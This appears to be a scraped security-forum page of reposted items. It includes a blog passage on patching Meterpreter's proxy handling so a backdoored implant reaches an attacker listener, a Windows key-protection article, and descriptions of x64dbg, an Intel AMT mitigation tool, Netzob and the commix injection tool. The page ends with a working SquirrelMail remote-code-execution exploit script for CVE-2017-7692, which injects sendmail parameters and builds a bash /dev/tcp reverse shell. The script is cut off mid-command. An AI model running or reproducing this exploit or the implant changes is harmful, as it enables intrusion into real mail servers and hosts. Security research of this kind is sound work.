(Private/Proxy autodiscovery) with the proxy URL that should be used to obtain information about the proxy. Remember that this is what we obtained before using the autoprox.exe tool. Before continuing, it is important to understand the three alternatives that Windows provides for proxy configuration: Automatically detect settings: use the URL obtained via DHCP (options 252) or request the WPAD hostname via DNS, LLMNR or NBNS (if enabled). Use automatic configuration script: download the configuration script from the specified URL and use it for determining when to use proxy servers. Proxy server: manually configured proxy server for different protocols. So, now that we have more precise information about the problem root cause, I will slightly modify the code to specifically consider the Auto Detect possibility. Let’s first do it in Python, and if it works then update the Meterpreter C code and build the Meterpreter payload. The following is the modified Python code: In the modified code it can be observed that it now considers the possibility of a proxy configured via DHCP/DNS. Let’s now run it and see how it behaves. The following screenshot shows the output of the modified Python code run on the victim machine: Observe that it successfully detected the proxy configuration that was obtained via DHCP and it shows the exact same proxy we observed at the beginning of this article (10.x.x.20). Now that we know that this code works, let’s update the Meterpreter C source code (server_transport_winhttp.c) to test it with our backdoored binary. The following extract of code shows the updated piece on the Meterpreter source code: In the dark grey zone, it can be observed the updated portion. After modifying it, build the solution again, copy the resulting metsrv Meterpreter DLL to the listener machine and run the listener again to wait for the client. The following screenshot shows the listener running on the attacker machine: Observe how it was possible to successfully obtain a Meterpreter session when the victim machine uses the proxy “Auto Detect” configuration (DHCP option 252 in this case). Problem root cause Now, it is time to discuss something you may have wondered when reading this article: Why did the stager was able to reach the attacker machine in first place? What is the difference between the stager payload and the stage one in terms of communications? In order to find the answer for those questions, we first need to understand how Meterpreter works at the moment of this writing. Let’s start by the beginning: the Windows API provides two mechanisms or interfaces to communicate via HTTP(s): WinInet and WinHTTP. In the context of Meterpreter, there are two features that are interesting for us when dealing with HTTPs communication layer: The ability to validate the certificate signature presented by the HTTPs server (Metasploit listener running on the attacker machine) to prevent the content inspection by agents such as L7 network firewalls. In other words, we desire to perform certificate pinning. The ability to transparently use the current’s user proxy configuration to be able to reach the listener through Internet. It turns out to be that both features cannot be found in the same Windows API, that is: WinInet: Is transparently proxy aware, which means that if the current user system proxy configuration is working for Internet Explorer, then it works for WinInet powered applications. Does not provide mechanisms to perform a custom validation of a SSL/TLS certificate. WinHTTP: Allows to trivially implement a custom verification of the SSL certificate presented by a server. Does not use the current user system proxy configuration transparently. Now, in terms of Meterpreter, we have two different stagers payloads that can be used: The reverse_https Meterpreter payload uses WinInet Windows API, which means it cannot perform a certificate validation, but will use the proxy system transparently. That is, if the user can access Internet via IE, then the stager can also do it. The reverse_winhttps Meterpreter payload uses WinHTTP Windows API, which means it can perform a certificate validation, but the system proxy will have to be “used” manually. In the case of the Meterpreter payload itself (the stage payload), it uses WinHTTP Windows API by default and will fallback to WinInet in case of error (see the documentation to understand a particular error condition with old proxy implementations), except if the user decided to use “paranoid mode”, because WinInet would not be able to validate the certificate, and this is considered a priority. Note: in the Meterpreter context, “paranoid mode” means that the SSL/TLS certificate signature HAS to be verified and if it was replaced on wire (e.g. a Palo Alto Network firewall being inspecting the content), then the stage should not be downloaded and therefore the session should not be initiated. If the user requires the use of “paranoid mode” for a particular escenario, then the stager will have to use WinHTTP. Now we have enough background to understand why we faced this problem. I was using the “reverse_https” Meterpreter payload (without caring about “paranoid mode” for testing purposes), which means that the stager used the WinInet API to reach the listener, that is, it was transparently using the current user proxy configuration that was properly working. However, as the Meterpreter stage payload uses, by default, the WinHTTP API and it has, according to my criteria, a bug, then it was not able to reach back the listener on the attacker machine. I think this provides an answer to both questions. Proxy identification approach Another question that we didn’t answer is: what would be the best approach to obtain the current user proxy configuration when using the WinHTTP Windows API? In order to provide an answer for that we need to find out what is the precedence when you have more than one proxy configured on the system and what does Windows do when one option is not working (does it try with another option?). According to what I found, the proxy settings in the Internet Option configuration dialog box are presented in the order of their precedence. First, the “Automatically detect settings” option is checked, next the “Use automatic configuration script” option is checked and finally the “Use a proxy for your LAN…” is checked. In addition, a sample code for using the WinHTTP API can be found in the “Developer code sample” of Microsoft MSDN that states: // Begin processing the proxy settings in the following order: // 1) Auto-Detect if configured. // 2) Auto-Config URL if configured. // 3) Static Proxy Settings if configured This suggests the same order of precedence we already mentioned. Fault tolerant implementation A last question that I have is what happens if a host is configured with multiple proxy options and one of them, with precedence, is not working? Does Windows will continue with the next option until it finds one that works? In order to provide an answer, we could perform a little experiment or expend hours and hours reversing the Windows components that involve this (mainly wininet.dll), so let’s start by doing the experiment that will, for sure, be less time consuming. Lab settings In order to further analyze the Windows proxy settings and capabilities, I created a lab environment with the following features: A Windows domain with one Domain Controller Domain: lab.bransh.com DC IP: 192.168.0.1 DHCP service (192.168.0.100–150) Three Microsoft Forefront TMG (Thread Management Gateway) tmg1.lab.bransh.com: 192.168.0.10 tmg2.lab.bransh.com: 192.168.0.11 tmg3.lab.bransh.com: 192.168.0.12 Every TMG server has two network interfaces: the “internal” interface (range 192.168.0.x) is connected to the domain and allows clients to reach Internet through it. The “external” interface is connected to a different network and is used by the Proxy to get direct Internet access. A Windows client (Windows 8.1 x64) IP via DHCP Proxy configuration: Via DHCP (option 252): tmg1.lab.bransh.com Via script: http://tmg2.lab.bransh.com/wpad.dat Manual: tmg3.lab.bransh.com:8080 The client cannot directly reach Internet Firefox browser is configured to use the system proxy The following screenshot shows the proxy settings configured in the Windows client host The following screenshot shows the proxy set via DHCP using the option 252: Note: the “Automatically detect settings” option can find the proxy settings either via DHCP or via DNS. When using the Windows API, it is possible to specify which one is desired or both. By means of a simple code that uses the API provided by Windows, it is possible to test a few proxy scenarios. Again, I write the code in Python, as it is very easy to modify and run the code without the need of compiling a C/C++ code in the testing machine every time a modification is needed. However you can do it in the language you prefer: The code above has two important functions: GetProxyInfoList(pProxyConfig, target_url): This function evaluates the proxy configuration for the current user, and returns a list of proxy network sockets (IP:PORT) that could be used for the specified URL. It is important to remark that the proxy list contains proxy addresses that could potentially be used to access the Url. However, it does not mean that the proxy servers are actually working. For example, the list could contain the proxy read from a WPAD.DAT file that was specified via the “Use automatic configuration script” option, but the proxy may not be available when trying to access the target URL. CheckProxyStatus(proxy, target_server, target_port): This function will test a proxy against a target server and port (using the root resource URI: /) to verify if the proxy is actually providing access to the resource. This function will help to decide if a proxy, when more than one is available, can be used or not. Testing scenario #1 In this scenario, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled after the client machine started. This means that the only option for the client machines to access Internet would be through the proxy server TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deals with the situation: The testing script shows the following: The option “Automatically detect settings” is enabled and the obtained proxy is “192.168.0.10:8080” (Windows downloaded the WPAD.PAC file in background and cached the obtained configuration before the proxy internal interface was disabled). However, the proxy is not working. As the internal interface of TMG1 was disabled, it was not possible to actually reach it through the network (a timeout was obtained). The option “Use automatic configuration script” is enabled and the obtained proxy is “192.168.0.11:8080” (Windows downloaded the WPAD.PAC file in background and cached the obtained configuration before the proxy internal interface was disabled). However, the proxy is not working. As the internal interface of TMG2 was disabled, it was not possible to actually reach it through the network (a timeout was obtained). The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy was successfully used and it was possible to send a request through it. Observe that neither IE nor Firefox were able to reach Internet with the presented configuration. However, a custom application that uses tmg3 as a proxy server would be able to successfully do it. Testing scenario #2 In this scenario, very similar to the #1, the internal network interfaces (192.168.0.x) of the proxy servers tmg1 and tmg2 are disabled before the client machine started. This means that the only option for the client machines to access Internet would be through the proxy server TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deals with the situation: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled (tmg1.lab.bransh.com/wpad.dat), but no proxy was obtained. This occurred because the proxy server (tmg1) was not reachable when the host received the DHCP configuration (and the option 252 in particular), therefore it was not able to download the wpad.dat proxy configuration file. The option “Use automatic configuration script” is enabled and the provided URL for the configuration file is “tmg2.lab.bransh.com/wpad.dat”. However, it was not possible to download the configuration script because the server is not reachable. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy was successfully used and it was possible to send a request through it. Observe that IE was able to understand the configuration and reach Internet. However Firefox was not. Testing scenario #3 In this scenario, the internal network interface (192.168.0.11) of the proxy server TMG2 was disabled before the client machine started. This means that client machines can access Internet through proxy servers TMG1 and TMG3. The following screenshot shows the output of the script. In addition, it shows how IE and Firefox deals with the situation: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled and it is possible to access Internet through the proxy obtained (192.168.0.10:8080). The option “Use automatic configuration script” is enabled and the provided URL for the configuration file is “tmg2.lab.bransh.com/wpad.dat”. However, as the network interface of this proxy was disabled, it was not possible to download the configuration script. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy was successfully used and it was possible to send a request through it. In addition, observe that IE was able to understand the configuration and reach Internet. However Firefox was not. Testing scenario #4 In this scenario, only the internal network interface (192.168.0.11) of the proxy server TMG2 is enabled: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled and it is not possible to access Internet through the proxy (192.168.0.10:8080). The option “Use automatic configuration script” is enabled and the provided URL for the configuration file is “tmg2.lab.bransh.com/wpad.dat”. In addition, the obtained proxy is 192.168.0.11:8080 and it is possible to reach Internet using it. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy is not reachable and a TIMEOUT is obtained. In addition, observe that IE was not able to understand the configuration and reach Internet. However Firefox successfully used the configuration and got access to Internet. Testing scenario #5 In this scenario, the internal network interfaces of all three proxy servers are enabled. However, the external interface of the servers TMG1 and TMG2 were disabled: When running our testing code, we can observe the following: The option “Automatically detect settings” is enabled, the specificed proxy (192.168.0.10:8080) is reachable. However it answers with an error (status code 502) indicating that it is not possible to reach Internet through it. The option “Use automatic configuration script” is also enabled, the specificed proxy (192.168.0.11:8080) is reachable. However it answers with an error (status code 502) indicating that it is not possible to reach Internet through it. The manually configured proxy server is “tmg3.lab.bransh.com:8080”. This proxy is reachable and it does provide access to Internet. Observe that neither IE nor Firefox were able to access Internet. However, a custom application that uses TMG3 as a proxy server would be able to successfully do it. Conclusion In certain scenarios, like the one exposed in the first part of this post, we will find that our favorite tool does not behaves as expected. In those situations we have mainly two options: try to find another solution or get our hands dirty and make it work. For the particular enterprise escenario I described, the fix applied to Meterpreter worked properly and after compiling its Dll, it was possible to make it work using the proxy configuration described. I’m not sure if this fix will be applied to the Meterpreter code, but if you find yourself with something like this, now you know what to do. On the other hand, we saw that Windows tries to use the proxy configuration in order (according to the precedence we already talked). However, it seems that once a proxy was obtained (e.g. scenario #1), if it does not work, Windows does not try to use another available option. Also, we saw that Internet Explorer and Firefox, when configured as “Use system proxy settings”, do not behave in the same way when looking for a Proxy. Finally, we also saw that in both cases, when a proxy is reachable but it does not provide Internet access for any reason (e.g. the Internet link died), they will not try to use a different one that may work. Considering the results, we can see that we do have the necessary API functions to evaluate all the proxy configurations and even test them to see if they actually allow to access an Internet resource. Therefore, with a few more lines of code we could make our APT solution more robust so that it works even under this kind of scenarios. However, I have to admit that this are very uncommon scenarios, where a client workstation has more than one proxy configured, and I don’t really think why an administrator could end up with this kind of mess. On the other hand, I’m not completely sure if it would be a good idea to make our APT work even if IE is not working. What if a host is believed to be disconnected from the Internet, but suddenly it starts showing Internet activity by cleverly using the available proxies. This may be strange for a blue team, perhaps. As a final conclusion, I would say that making our APT solution as robust as IE is would be enough to make it work in most cases. If IE is able to reach Internet, then the APT will be as well. References Auto Proxy:https://blogs.msdn.microsoft.com/askie/2014/02/07/optimizing-performance-with-automatic-proxyconfiguration-scripts-pac/ Windows Web Proxy Configuration: https://blogs.msdn.microsoft.com/ieinternals/2013/10/11/understanding-web-proxy-configuration/ Meterpreter building: https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter Meterpreter WinHTTP source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/server/win/server_transport_winhttp.c Meterpreter common.h source code: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/common/common.h Sysinternals DebugView: https://technet.microsoft.com/en-us/sysinternals/debugview.aspx WinHTTP vs WinInet: https://github.com/rapid7/metasploit-framework/wiki/The-ins-and-outs-of-HTTP-and-HTTPS-communications-in-Meterpreter-and-Metasploit-Stagers Metasploit bug report: https://github.com/rapid7/metasploit-payloads/issues/151 WinHTTP Sample Code: http://code.msdn.microsoft.com/windowsdesktop/WinHTTP-proxy-sample-eea13d0c Sursa: https://medium.com/@br4nsh/a-meterpreter-and-windows-proxy-case-4af2b866f4a1
-
- 2
-
-
How to keep a secret in Windows Protecting cryptographic keys is always a balancing act. For the keys to be useful they need to be readily accessible, recoverable and their use needs to be sufficiently performant so their use does not slow your application down. On the other hand, the more accessible and recoverable they are the less secure the keys are. In Windows, we tried to build a number of systems to help with these problems, the most basic was the Window Data Protection API (DPAPI). It was our answer to the question: “What secret do I use to encrypt a secret”. It can be thought of as a policy or DRM system since as a practical matter it is largely a speed bump for privileged users who want access to the data it protects. Over the years there have been many tools that leverage the user’s permissions to decrypt DPAPI protected data, one of the most recent was DPAPIPick. Even though I have framed this problem in the context of Windows, Here is a neat paper on this broad problem called “Playing hide and seek with stored keys”. The next level of key protection offered by Windows is a policy mechanism called “non-exportable keys” this is primarily a consumer of DPAPI. Basically, when you generate the key you ask Windows to deny its export, as a result the key gets a flag set on it that can not, via the API, be changed. The key and this flag are then protected with DPAPI. Even though this is just a policy enforced with a DRM-like system it does serve its purpose, reducing the casual copying of keys. Again over the years, there have been numerous tools that have leveraged the user’s permissions to access these keys, one of the more recent I remember was called Jailbreak (https://github.com/iSECPartners/jailbreak-Windows). There have also been a lot of wonderful walkthroughs of how these systems work, for example, this nice NCC Group presentation. The problem with all of the above mechanisms is that they are largely designed to protect keys from their rightful user. In other words, even when these systems work they key usually ends up being loaded into memory in the clear where it is accessible to the user and their applications. This is important to understand since the large majority of applications that use cryptography in Windows do so in the context of the user. A better solution to protecting keys from the user is putting them behind protocol specific APIs that “remote” the operation to a process in another user space. We would call this process isolation and the best example of this in Windows is SCHANNEL. SCHANNEL is the TLS implementation in Windows, prior to Windows 2003 the keys used by SCHANNEL were loaded into the memory of the application calling it. In 2003 we moved the cryptographic operations into Local Security Authority Subsystem Service (LSAS) which is essentially RING 0 in Windows. By moving the keys to this process we help protect, but don’t prevent, them from user mode processes but still enable applications to do TLS sessions. This comes at an expense, you now need to marshal data to and from user mode and LSAS which hurts performance. [Nasko, a former SCHANNEL developer tells me he believes it was the syncronous nature of SSPI that hurt the perf the most, this is likely, but the net result is the same] In fact, this change was cited as one of the major reasons IIS was so much slower than Apache for “real workloads” in Windows Server 2003. It is worth noting those of us involved in the decision to make this change surely felt vindicated when Heartbleed occurred. This solution is not perfect either, again if you are in Ring 0 you can still access the cryptographic keys. When you want to address this risk you would then remote the cryptographic operation to a dedicated system managed by a set of users that do not include the user. This could be TCP/IP remoted cryptographic service (like Microsoft KeyVault, or Google Cloud Key Manager) or maybe a Hardware Security Module (HSM) or smart card. This has all of the performance problems of basic process isolation but worse because the transition from the user mode to the protected service is even “further” or “bandwidth” constrained (smart cards often run at 115k BPS or slower). In Windows, for TLS, this is accomplished through providers to CNG, CryptoAPI CSPs, and Smartcard minidrivers. These solutions are usually closed source and some of the security issues I have seen in them over the years are appalling but despite their failings, there is a lot of value in getting keys out of the user space and this is the most effective way of doing that. These devices also provide, to varying degrees, protection from physical, timing and other more advanced attacks. Well, that is my summary of the core key protection schemes available in Windows. Most operating systems have similar mechanisms, Windows just has superior documentation and has answers to each of these problems in “one logical place” vs from many different libraries from different authors. Ryan Sursa: https://unmitigatedrisk.com/?p=586
-
- 1
-
-
x64dbg Note Please run install.bat before you start committing code, this ensures your code is auto-formatted to the x64dbg standards. Compiling For a complete guide on compiling x64dbg read this. Downloads Releases of x64dbg can be found here. Jenkins build server can be found here. Overview x64dbg is an open-source x32/x64 debugger for Windows. Activity Graph Features Open-source Intuitive and familiar, yet new user interface C-like expression parser Full-featured debugging of DLL and EXE files (TitanEngine) IDA-like sidebar with jump arrows IDA-like instruction token highlighter (highlight registers, etc.) Memory map Symbol view Thread view Source code view Content-sensitive register view Fully customizable color scheme Dynamically recognize modules and strings Import reconstructor integrated (Scylla) Fast disassembler (Capstone) User database (JSON) for comments, labels, bookmarks, etc. Plugin support with growing API Extendable, debuggable scripting language for automation Multi-datatype memory dump Basic debug symbol (PDB) support Dynamic stack view Built-in assembler (XEDParse/Keystone/asmjit) Executable patching Yara Pattern Matching Decompiler (Snowman) Analysis License x64dbg is licensed under GPLv3, which means you can freely distribute and/or modify the source of x64dbg, as long as you share your changes with us. The only exception is that plugins you write do not have to comply with the GPLv3 license. They do not have to be open-source and they can be commercial and/or private. The only exception to this is when your plugin uses code copied from x64dbg. In that case you would still have to share the changes to x64dbg with us. Credits Debugger core by TitanEngine Community Edition Disassembly powered by Capstone Assembly powered by XEDParse, Keystone and asmjit Import reconstruction powered by Scylla JSON powered by Jansson Database compression powered by lz4 Advanced pattern matching powered by yara Decompilation powered by snowman Bug icon by VisualPharm Interface icons by Fugue Website by tr4ceflow Special Thanks All the donators! Everybody adding issues! People I forgot to add to this list EXETools community Tuts4You community ReSharper Coverity acidflash cyberbob cypher Teddy Rogers TEAM DVT DMichael Artic ahmadmansoor _pusher_ firelegend kao sstrato kobalicek Developers mrexodia Sigma tr4ceflow Dreg Nukem Herz3h torusrxxx Contributors blaquee wk-952 RaMMicHaeL lovrolu fileoffset SmilingWolf ApertureSecurity mrgreywater Dither zerosum0x0 RadicalRaccoon fetzerms muratsu ForNeVeR wynick27 Atvaark Avin mrfearless Storm Shadow shamanas joesavage justanotheranonymoususer gushromp Forsari0 Link: https://github.com/x64dbg/x64dbg L-am testat recent, e stabil si capabil.
-
Disable Intel AMT Tool to disable Intel AMT on Windows. Runs on both x86 and x64 Windows operating systems. Download: DisableAMT.exe DisableAMT.zip What? On 02 May 2017, Embedi discovered "an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology versions firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products". Read also: Intel Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability Escalation of Privilege Assigned CVE: CVE-2017-5689 Wait, what? Your machine may be vulnerable to hackers. How do I know if I'm affected? If you see any of these stickers or badges on your laptop, notebook or desktop, you are likely affected by this: You may want to read: How To Find Intel® vPro™ Technology Based PCs Usage Simple. Download and run DisableAMT.exe, and it will do the work for you. This is based on the instructions provided by the INTEL-SA-00075 Mitigation Guide When executing the tool, it will run quickly and when done, will present you with the following screen: Type Y or N if you would also like to automatically disable (by renaming) the actual LMS.exe (Intel Local Management Service) binary. When finished, a logfile will open up. Reboot your machine at this point. That's all! Details about the tool The tool is simply written in batch, and has the necessary components inside to unconfigure AMT. The batch file was compiled to an executable using the free version of Quick Batch File Compiler, and subsequently packed with UPX to reduce filesize. Additionally, ACUConfig.exe and ACU.dll from Intel's Setup and Configuration Software package is included. You may find all these files in the 'src' folder. Please find hashes below: Filename MD5 SHA1 SHA256 DisableAMT.exe 3a7f3c23ea25279084f0245dfa7ecb21 383fc99f149c4aec3536ed5370dc4b07f7f93028 f0cecef7f5d1b8be8feeddf83c71892bf9dd6e28b325f88e0c071c6be34b8c19 DisableAMT.zip 0458d8e23a527e74b567d7fa4b342fec f7b73115bfbacaea32da833deaf7c1187d1bfc40 143ffd107c3861a95e829d26baeb30316ded89bb494e74467bcfb8219f895c3b DisableAMT.bat c00bc5a37cb7a66f53aec5e502116a5c 51ca8a7c3f5a81a31115618af4245df13aa39a90 a58c56c61ba7eae6d0db27b2bc02e05444befca885b12d84948427fff544378a ACUConfig.exe 4117b39f1e6b599f758d59f34dc7642c 7595bc7a97e7ddab65f210775e465aa6a87df4fd 475e242953ab8e667aa607a4a7966433f111f8adbb3f88d8b21052b4c38088f7 ACU.dll a98f9acb2059eff917b13aa7c1158150 d869310f28fce485da0c099f7df349c82a005f30 c569d9ce5024bb5b430bab696f2d276cfdc068018a84703b48e6d74a13dadfd7 Is there an easier way to do this? Probably. Link: https://github.com/bartblaze/Disable-Intel-AMT
-
- 1
-
-
Netzob : Protocol Reverse Engineering, Modeling and Fuzzing
Nytro posted a topic in Programe hacking
Netzob : Protocol Reverse Engineering, Modeling and Fuzzing About Welcome to the official repository of Netzob. Netzob is a tool that can be use to reverse engineer, model and fuzz communication protocols. It is made of two components: netzob a python project that exposes all the features of netzob (except GUI) you can import in your own tool or use in CLI, netzob_web a graphical interface that leverages web technologies. Source codes, documentations and resources are available for each component, please visit their dedicated directories. General Information Email: contact@netzob.org Mailing list: Two lists are available, use the SYMPA web interface to register. IRC: You can hang-out with us on Freenode's IRC channel #netzob @ freenode.org. Twitter: Follow Netzob's official accounts (@Netzob) Authors, Contributors and Sponsors See the top distribution file AUTHORS.txt in each component for the detailed and updated list of their authors, contributors and sponsors. Extra Zoby, the official mascot of Netzob. Link: https://github.com/netzob/netzob-
- 2
-
-
eneral Information Commix (short for [comm]and njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header. Disclaimer This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! Requirements Python version 2.6.x or 2.7.x is required for running this program. Installation Download commix by cloning the Git repository: git clone https://github.com/commixproject/commix.git commix Commix comes packaged on the official repositories of the following Linux distributions, so you can use the package manager to install it! ArchStrike BlackArch Linux BackBox Kali Linux Parrot Security OS Weakerthan Linux Commix also comes as a plugin, on the following penetration testing frameworks: TrustedSec's Penetration Testers Framework (PTF) OWASP Offensive Web Testing Framework (OWTF) CTF-Tools PentestBox PenBox Katoolin Aptive's Penetration Testing tools Homebrew Tap - Pen Test Tools Supported Platforms Linux Mac OS X Windows (experimental) Usage To get a list of all options and switches use: python commix.py -h Q: Where can I check all the available options and switches? A: Check the 'usage' wiki page. Usage Examples Q: Can I get some basic ideas on how to use commix? A: Just go and check the 'usage examples' wiki page, where there are several test cases and attack scenarios. Upload Shells Q: How easily can I upload web-shells on a target host via commix? A: Commix enables you to upload web-shells (e.g metasploit PHP meterpreter) easily on target host. For more, check the 'upload shells' wiki page. Modules Development Q: Do you want to increase the capabilities of the commix tool and/or to adapt it to our needs? A: You can easily develop and import our own modules. For more, check the 'module development' wiki page. Command Injection Testbeds Q: How can I test or evaluate the exploitation abilities of commix? A: Check the 'command injection testbeds' wiki page which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks. Exploitation Demos Q: Is there a place where I can check for demos of commix? A: If you want to see a collection of demos, about the exploitation abilities of commix, take a look at the 'exploitation demos' wiki page. Bugs and Enhancements Q: I found a bug / I have to suggest a new feature! What can I do? A: For bug reports or enhancements, please open an issue here. Presentations and White Papers Q: Is there a place where I can find presentations and/or white papers regarding commix? A: For presentations and/or white papers published in conferences, check the 'presentations' wiki page. Support and Donations Q: Except for tech stuff (bug reports or enhancements) is there any other way that I can support the development of commix? A: Sure! Commix is the outcome of many hours of work and total personal dedication. Feel free to 'donate' via PayPal to donations@commixproject.com and instantly prove your feelings for it! :). Link: https://github.com/commixproject/commix
-
Publicat pe 3 mai 2017 We take a look into the malware Gatak which uses WriteProcessMemory and CreateRemoteThread to inject code into rundll32.exe. Many thanks to @_jsoo_ for providing the sample! Follow me on Twitter: https://twitter.com/struppigel Gatak VirusBtn article: https://www.virusbulletin.com/virusbu... Sample: https://www.hybrid-analysis.com/sampl... API Monitor: http://www.rohitab.com/apimonitor Process Explorer: https://technet.microsoft.com/en-us/s... x64dbg: http://x64dbg.com/ HxD: https://mh-nexus.de/en/hxd/
-
- 3
-
-
#!/bin/bash # int='\033[94m __ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) SquirrelMail_RCE_exploit.sh (ver. 1.0) Discovered and coded by Dawid Golunski (@dawid_golunski) https://legalhackers.com ExploitBox project: https://ExploitBox.io \033[0m' # Quick and messy PoC for SquirrelMail webmail application. # It contains payloads for 2 vectors: # * File Write # * RCE # It requires user credentials and that SquirrelMail uses # Sendmail method as email delivery transport # # # Full advisory URL: # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html # Exploit URL: # https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh # # Tested on: # Ubuntu 16.04 # squirrelmail package version: # 2:1.4.23~svn20120406-2ubuntu1.16.04.1 # # Disclaimer: # For testing purposes only # # # ----------------------------------------------------------------- # # Interested in vulns/exploitation? # Stay tuned for my new project - ExploitBox # # .;lc' # .,cdkkOOOko;. # .,lxxkkkkOOOO000Ol' # .':oxxxxxkkkkOOOO0000KK0x:' # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. # '';ldxxxxxdc,. ,oOXXXNNNXd;,. # .ddc;,,:c;. ,c: .cxxc:;:ox: # .dxxxxo, ., ,kMMM0:. ., .lxxxxx: # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: # .dxxxxxdl;. ., .. .;cdxxxxxx: # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. # .':oxxxxxxxxx.ckkkkkkkkxl,. # .,cdxxxxx.ckkkkkxc. # .':odx.ckxl,. # .,.'. # # https://ExploitBox.io # # https://twitter.com/Exploit_Box # # ----------------------------------------------------------------- sqspool="/var/spool/squirrelmail/attach/" echo -e "$int" #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n" #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n" #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n" # Base URL if [ $# -ne 1 ]; then echo -e "Usage: \n$0 SquirrelMail_URL" echo -e "Example: \n$0 http://target/squirrelmail/ \n" exit 2 fi URL="$1" # Log in echo -e "\n[*] Enter SquirrelMail user credentials" read -p "user: " squser read -sp "pass: " sqpass echo -e "\n\n[*] Logging in to SquirrelMail at $URL" curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect if [ $? -eq 0 ]; then echo "Invalid creds" exit 2 fi sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" # Prepare Sendmail cnf # # * The config will launch php via the following stanza: # # Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, # T=DNS/RFC822/X-Unix, # A=php -- $u $h ${client_addr} # wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf # Upload config echo -e "\n\n[*] Uploading Sendmail config" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`" if [ ${#attachid} -lt 32 ]; then echo "Something went wrong. Failed to upload the sendmail file." exit 2 fi # Create Sendmail cmd string according to selected payload echo -e "\n\n[?] Select payload\n" # SELECT PAYLOAD echo "1 - File write (into /tmp/sqpoc)" echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)" echo read -p "[1-2] " pchoice case $pchoice in 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc" ;; 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid" ;; esac if [ $pchoice -eq 2 ]; then echo read -p "Reverese shell IP: " reverse_ip read -p "Reverese shell PORT: " reverse_port fi # Reverse shell code phprevsh=" <?php \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\"; file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd); system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\"); ?>" # Set sendmail params in user settings echo -e "\n[*] Injecting Sendmail command parameters" token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode 